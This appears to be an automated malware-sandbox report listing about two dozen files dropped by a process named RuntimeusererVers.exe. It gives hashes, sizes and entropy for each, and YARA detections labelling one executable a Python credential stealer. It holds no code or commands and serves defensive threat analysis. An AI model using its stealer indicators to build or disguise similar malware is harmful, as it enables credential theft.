                                                                                                                                                                                                                                        SHA-256:FFF69928DEA1432E0C7CB1225AB96F94FD38D5D852DE9A6BB8BF30B7D2BEDCEB
                                                                                                                                                                                                                                        SHA-512:341CEC015E74348EAB30D86EBB35C028519703006814A2ECD19B9FE5E6FCB05EDA6DDE0AAF4FE624D254B0D0180EC32ADF3B93EE96295F8F0F4C9D4ED27A7C0C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):115712
                                                                                                                                                                                                                                        Entropy (8bit):5.890497931382238
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:rKLwVA2epJbdfD3NTSGkzsvDNIWN4ZgibPq0kgIWgymA5TGK2MLVur:rKL/dhTMzsbNd9ibPavPA5TGK7Qr
                                                                                                                                                                                                                                        MD5:2D1F2FFD0FECF96A053043DAAD99A5DF
                                                                                                                                                                                                                                        SHA1:B03D5F889E55E802D3802D0F0CAA4D29C538406B
                                                                                                                                                                                                                                        SHA-256:207BBAE9DDF8BDD64E65A8D600FE1DD0465F2AFCD6DC6E28D4D55887CD6CBD13
                                                                                                                                                                                                                                        SHA-512:4F7D68F241A7F581E143A010C78113154072C63ADFF5F200EF67EB34D766D14CE872D53183EB2B96B1895AA9C8D4CA82EE5E61E1C5E655FF5BE56970BE9EBE3E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6673920
                                                                                                                                                                                                                                        Entropy (8bit):6.582002531606852
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:EzN+T+xtLlk0PPMAiGoTzeDy3x8lGBlWi9Nk:E5Y6Jk0PPMtfTzp3x8c
                                                                                                                                                                                                                                        MD5:486085AAC7BB246A173CEEA0879230AF
                                                                                                                                                                                                                                        SHA1:EF1095843B2A9C6D8285C7D9E8E334A9CE812FAE
                                                                                                                                                                                                                                        SHA-256:C3964FC08E4CA8BC193F131DEF6CC4B4724B18073AA0E12FED8B87C2E627DC83
                                                                                                                                                                                                                                        SHA-512:8A56774A08DA0AB9DD561D21FEBEEBC23A5DEA6F63D5638EA1B608CD923B857DF1F096262865E6EBD56B13EFD3BBA8D714FFDCE8316293229974532C49136460
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51712
                                                                                                                                                                                                                                        Entropy (8bit):5.664902275560485
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:cXkHpFLJOXgD7JKgegsvC1wryTXkHjQwDchoPWmzDD/:cXkH/Qswge1WwryTXk8mchoPWmz
                                                                                                                                                                                                                                        MD5:34C2DD52C9E920E035444D6CBDDEB555
                                                                                                                                                                                                                                        SHA1:3FF99987B968261E88032652917F137D4A6A0493
                                                                                                                                                                                                                                        SHA-256:55814D323EE1EC6CD6145AE8F43DBF44D9481E3592AA17B5A17010F7E401FF42
                                                                                                                                                                                                                                        SHA-512:8F0BE0A3E2588BDEFF9F5C4EB728AE43A58A19B91596ADCA0C931D5425A591178F13DCEF68B1B949A2C805E1B9963800397F661688FD3C299D7084EFE45ADAF7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3445016
                                                                                                                                                                                                                                        Entropy (8bit):6.099467326309974
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:+/+YgEQaGDoWS04ki7x+QRsZ51CPwDv3uFfJx:MLgEXGUZ37x+VZ51CPwDv3uFfJx
                                                                                                                                                                                                                                        MD5:E94733523BCD9A1FB6AC47E10A267287
                                                                                                                                                                                                                                        SHA1:94033B405386D04C75FFE6A424B9814B75C608AC
                                                                                                                                                                                                                                        SHA-256:F20EB4EFD8647B5273FDAAFCEB8CCB2B8BA5329665878E01986CBFC1E6832C44
                                                                                                                                                                                                                                        SHA-512:07DD0EB86498497E693DA0F9DD08DE5B7B09052A2D6754CFBC2AA260E7F56790E6C0A968875F7803CB735609B1E9B9C91A91B84913059C561BFFED5AB2CBB29F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):39696
                                                                                                                                                                                                                                        Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                        MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                        SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                        SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                        SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):704792
                                                                                                                                                                                                                                        Entropy (8bit):5.55753143710539
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:ihO7/rNKmrouK/POt6h+7ToRLgo479dQwwLOpWW/dQ0T9qwfU2lvzA:iis/POtrzbLp5dQ0T9qcU2lvzA
                                                                                                                                                                                                                                        MD5:25BDE25D332383D1228B2E66A4CB9F3E
                                                                                                                                                                                                                                        SHA1:CD5B9C3DD6AAB470D445E3956708A324E93A9160
                                                                                                                                                                                                                                        SHA-256:C8F7237E7040A73C2BEA567ACC9CEC373AADD48654AAAC6122416E160F08CA13
                                                                                                                                                                                                                                        SHA-512:CA2F2139BB456799C9F98EF8D89FD7C09D1972FA5DD8FC01B14B7AF00BF8D2C2175FB2C0C41E49A6DAF540E67943AAD338E33C1556FD6040EF06E0F25BFA88FA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):46592
                                                                                                                                                                                                                                        Entropy (8bit):5.344765898080963
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:i005Gi4zzWerZi5s+AP6tzPVtLZ9rthfBie/4jejOcmKnNrODgYMjtNtnlsht6oR:thWu6tVlBiIjnVOIjbMrYyeW
                                                                                                                                                                                                                                        MD5:B92F8EFB672C383AB60B971B3C6C87DE
                                                                                                                                                                                                                                        SHA1:ACB671089A01D7F1DB235719C52E6265DA0F708F
                                                                                                                                                                                                                                        SHA-256:B7376B5D729115A06B1CAB60B251DF3EFC3051EBBA31524EA82F0B8DB5A49A72
                                                                                                                                                                                                                                        SHA-512:680663D6C6CD7B9D63160C282F6D38724BD8B8144D15F430B28B417DDA0222BFFF7AFEFCB671E863D1B4002B154804B1C8AF2D8A28FFF11FA94972B207DF081B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):143360
                                                                                                                                                                                                                                        Entropy (8bit):6.075135460374895
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:yYjAONgTgGNWARNEBXRzHJ0Xg9sGkD7EKN7Jv1FL/49olpS0mZP0c:nlTmsCD7Z7Jv19/49olY0m10c
                                                                                                                                                                                                                                        MD5:E611E5C516FE1C3670353E3427DA42B9
                                                                                                                                                                                                                                        SHA1:A946ABDEEBE7FA9CCD7AB256C927BE5902784E4A
                                                                                                                                                                                                                                        SHA-256:B4F41659DC3002F70BC6578801AAD771B45F106103441D1E9B4C553C1E50C939
                                                                                                                                                                                                                                        SHA-512:A1C057DBD4B618FDFDD75F70BFE85DBFC6D2A25FED8E74DD5FBF950A02D7470E1F4BFAC8ED00A5CDEF6A68B8737A156A5A0EA443E826C6B30C94554BD7326B99
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):199448
                                                                                                                                                                                                                                        Entropy (8bit):6.377510350928234
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:OA1YT2Ga6xWK+RohrRoi9+IC08K9YSMJiCNi+GVwlijAOBgC4i9IPLhhHx:v1YOyGohNoEC08K9oJ5GWl7Fi
                                                                                                                                                                                                                                        MD5:9C21A5540FC572F75901820CF97245EC
                                                                                                                                                                                                                                        SHA1:09296F032A50DE7B398018F28EE8086DA915AEBD
                                                                                                                                                                                                                                        SHA-256:2FF8CD82E7CC255E219E7734498D2DEA0C65A5AB29DC8581240D40EB81246045
                                                                                                                                                                                                                                        SHA-512:4217268DB87EEC2F0A14B5881EDB3FDB8EFE7EA27D6DCBEE7602CA4997416C1130420F11167DAC7E781553F3611409FA37650B7C2B2D09F19DC190B17B410BA5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):67352
                                                                                                                                                                                                                                        Entropy (8bit):6.146621901948148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:rw/EsYpkVgBaz57kcDA7QKFmpz7cnzH/ks/KF61xubwmB1Cf//yhC74JFmpktJSy:8/5k8cnzeJf9IPL037SyG3Px
                                                                                                                                                                                                                                        MD5:B711598FC3ED0FE4CF2C7F3E0877979E
                                                                                                                                                                                                                                        SHA1:299C799E5D697834AA2447D8A313588AB5C5E433
                                                                                                                                                                                                                                        SHA-256:520169AA6CF49D7EE724D1178DE1BE0E809E4BDCF671E06F3D422A0DD5FD294A
                                                                                                                                                                                                                                        SHA-512:B3D59EFF5E38CEF651C9603971BDE77BE7231EA8B7BDB444259390A8A9E452E107A0B6CB9CC93E37FD3B40AFB2BA9E67217D648BFCA52F7CDC4B60C7493B6B84
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5762840
                                                                                                                                                                                                                                        Entropy (8bit):6.089392282930885
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:73djosVvASxQKADxYBVD0NErnKqroleDkcWE/Q3pPITbwVFZL7VgVr42I1vJHH++:73ZOKRtlrJ7wfGrs1BHeM+2PocL2
                                                                                                                                                                                                                                        MD5:5A5DD7CAD8028097842B0AFEF45BFBCF
                                                                                                                                                                                                                                        SHA1:E247A2E460687C607253949C52AE2801FF35DC4A
                                                                                                                                                                                                                                        SHA-256:A811C7516F531F1515D10743AE78004DD627EBA0DC2D3BC0D2E033B2722043CE
                                                                                                                                                                                                                                        SHA-512:E6268E4FAD2CE3EF16B68298A57498E16F0262BF3531539AD013A66F72DF471569F94C6FCC48154B7C3049A3AD15CBFCBB6345DACB4F4ED7D528C74D589C9858
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):30480
                                                                                                                                                                                                                                        Entropy (8bit):6.578957517354568
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:N1ecReJKrHqDUI7A700EZ9IPQGNHQIYiSy1pCQn1tPxh8E9VF0NykfF:3eUeJGHqNbD9IPQGR5YiSyvnnPxWEuN
                                                                                                                                                                                                                                        MD5:C97A587E19227D03A85E90A04D7937F6
                                                                                                                                                                                                                                        SHA1:463703CF1CAC4E2297B442654FC6169B70CFB9BF
                                                                                                                                                                                                                                        SHA-256:C4AA9A106381835CFB5F9BADFB9D77DF74338BC66E69183757A5A3774CCDACCF
                                                                                                                                                                                                                                        SHA-512:97784363F3B0B794D2F9FD6A2C862D64910C71591006A34EEDFF989ECCA669AC245B3DFE68EAA6DA621209A3AB61D36E9118EBB4BE4C0E72CE80FAB7B43BDE12
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1504024
                                                                                                                                                                                                                                        Entropy (8bit):6.578962536427207
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:85Cmr6e6a6Ias3yjWdQty0ok8k378UZk+ZfZ4Se6TOs9CedxnYhR2Au:81/uIasCjWdaHokXk+9Z4Se6TO4dFYL5
                                                                                                                                                                                                                                        MD5:08D50FD2B635972DC84A6FB6FC581C06
                                                                                                                                                                                                                                        SHA1:4BCFC96A1AAD74F7AB11596788ACB9A8D1126064
                                                                                                                                                                                                                                        SHA-256:BB5AC4945B43611C1821FA575AF3152B2937B4BC1A77531136780CC4A28F82E9
                                                                                                                                                                                                                                        SHA-512:8EC536E97D7265F007AD0F99FC8B9EECC9355A63F131B96E8A04E4BD38D3C72E3B80E36E4B1923548BD77EB417C5E0AC6A01D09AF23311784A328FBED3C41084
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1141016
                                                                                                                                                                                                                                        Entropy (8bit):5.435086202175289
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:83kYbfjwR6nblonRiPDjRrO5184EPYPx++ZiLKGZ5KXyVH4eD1ol:8UYbMA0IDJcjEwPgPOG6Xyd461ol
                                                                                                                                                                                                                                        MD5:AA13EE6770452AF73828B55AF5CD1A32
                                                                                                                                                                                                                                        SHA1:C01ECE61C7623E36A834D8B3C660E7F28C91177E
                                                                                                                                                                                                                                        SHA-256:8FBED20E9225FF82132E97B4FEFBB5DDBC10C062D9E3F920A6616AB27BB5B0FB
                                                                                                                                                                                                                                        SHA-512:B2EEB9A7D4A32E91084FDAE302953AAC57388A5390F9404D8DFE5C4A8F66CA2AB73253CF5BA4CC55350D8306230DD1114A61E22C23F42FBCC5C0098046E97E0F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):109392
                                                                                                                                                                                                                                        Entropy (8bit):6.641929675972235
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
                                                                                                                                                                                                                                        MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
                                                                                                                                                                                                                                        SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
                                                                                                                                                                                                                                        SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
                                                                                                                                                                                                                                        SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):67072
                                                                                                                                                                                                                                        Entropy (8bit):5.872119413277649
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:0lC4VDCD5Pd8jeE9+d8cxIRJpyZVEqyaFtYpquFajBSsDJLSGg8fJwJ5ZRYuK5G:48Dv8qo+xIRyo+FtaFMBFDv7OJ543
                                                                                                                                                                                                                                        MD5:0EDC0F96B64523314788745FA2CC7DDD
                                                                                                                                                                                                                                        SHA1:555A0423CE66C8B0FA5EEA45CAAC08B317D27D68
                                                                                                                                                                                                                                        SHA-256:DB5B421E09BF2985FBE4EF5CDF39FC16E2FF0BF88534E8BA86C6B8093DA6413F
                                                                                                                                                                                                                                        SHA-512:BB0074169E1BD05691E1E39C2E3C8C5FAE3A68C04D851C70028452012BB9CB8D19E49CDFF34EFB72E962ED0A03D418DFBAD34B7C9AD032105CF5ACD311C1F713
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):655360
                                                                                                                                                                                                                                        Entropy (8bit):6.429498330590438
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:Xs/doJlY/OBzRSxUlcUmNNuNkOFIj+fWT0hrHPPoX1yZcG7:mAuOBzRSxUlvFIj+fWIPPM1yZcg
                                                                                                                                                                                                                                        MD5:4327027D7CB61F547E22C4F668EB7BF7
                                                                                                                                                                                                                                        SHA1:22F413D03A90D04D571526687E43EB255F427435
                                                                                                                                                                                                                                        SHA-256:E681900AEB771E57BC063E44B303293E11DF32F1B1FECDCBC00574C00E75626C
                                                                                                                                                                                                                                        SHA-512:16A2E2E262C0246906D48EA67EE17D38C07712A1B97EB18C4F8F656F39EB187E18DA3EDC6D2FDF49DC9E35B92F6BA6BDE0F00948C3E68E146F7EDCD1E9C9404A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):524800
                                                                                                                                                                                                                                        Entropy (8bit):6.43361179692515
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:LhqzrH09USNNSNkUvpMnAp5Oqwj/k6OsoOfu/PYS/O51Y/H:LhqzrH0evpMnApu86OsynYUPv
                                                                                                                                                                                                                                        MD5:DC08F04C9E03452764B4E228FC38C60B
                                                                                                                                                                                                                                        SHA1:317BCC3F9C81E2FC81C86D5A24C59269A77E3824
                                                                                                                                                                                                                                        SHA-256:B990EFBDA8A50C49CD7FDE5894F3C8F3715CB850F8CC4C10BC03FD92E310260F
                                                                                                                                                                                                                                        SHA-512:FBC24DD36AF658CECE54BE14C1118AF5FDA4E7C5B99D22F99690A1FD625CC0E8AA41FD9ACCD1C74BB4B03D494B6C3571B24F2EE423AAAE9A5AD50ADC583C52F7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24189952
                                                                                                                                                                                                                                        Entropy (8bit):6.346346908201171
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:CFUine3T2HszWM/LvOrN6hC0lxy6D5DKJBlZGODSr1YQaxLaIaiFrEF9o31g6d6T:lD+SWKOr4CeXDuHwODSw6uc
                                                                                                                                                                                                                                        MD5:D71750B08D81D33E6BEAD1CEB707BC4F
                                                                                                                                                                                                                                        SHA1:CEB0FE13317E7EF87377D385E9CF869343958971
                                                                                                                                                                                                                                        SHA-256:6D350FD6D807F267F5B615CF5937DABB99E5F30ED3B3310E1BF2AA2A34F93F8E
                                                                                                                                                                                                                                        SHA-512:9CDC43BCE53CC6B9A388B9FB50BF81DB413432BEB0B607D14942DB6CEDDCEEB38CBEB9896916BF73A72E06731D16755F20A475523BE63177996A3D9BCDD6FA0B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65304
                                                                                                                                                                                                                                        Entropy (8bit):6.186171767195339
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:a2icaMc9070S1Qx+gTKnEzBIPOnr07SyLLDPx:a2icrcj2Qx+gTOEzBIPOnYxXx
                                                                                                                                                                                                                                        MD5:79F71C92C850B2D0F5E39128A59054F1
                                                                                                                                                                                                                                        SHA1:A773E62FA5DF1373F08FEAA1FB8FA1B6D5246252
                                                                                                                                                                                                                                        SHA-256:0237739399DB629FDD94DE209F19AC3C8CD74D48BEBE40AD8EA6AC7556A51980
                                                                                                                                                                                                                                        SHA-512:3FDEF4C04E7D89D923182E3E48D4F3D866204E878ABCAACFF657256F054AEAFAFDD352B5A55EA3864A090D01169EC67B52C7F944E02247592417D78532CC5171
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):820736
                                                                                                                                                                                                                                        Entropy (8bit):6.056263694016779
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:cY0Uu7wLsglBv4i5DGAqXMAHhlyL82XTw05nmZfR7o:cp0NA1tAmZfR
                                                                                                                                                                                                                                        MD5:D9FC15CAF72E5D7F9A09B675E309F71D
                                                                                                                                                                                                                                        SHA1:CD2B2465C04C713BC58D1C5DE5F8A2E13F900234
                                                                                                                                                                                                                                        SHA-256:1FCD75B03673904D9471EC03C0EF26978D25135A2026020E679174BDEF976DCF
                                                                                                                                                                                                                                        SHA-512:84F705D52BD3E50AC412C8DE4086C18100EAC33E716954FBCB3519F4225BE1F4E1C3643D5A777C76F7112FAE30CE428E0CE4C05180A52842DACB1F5514460006
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
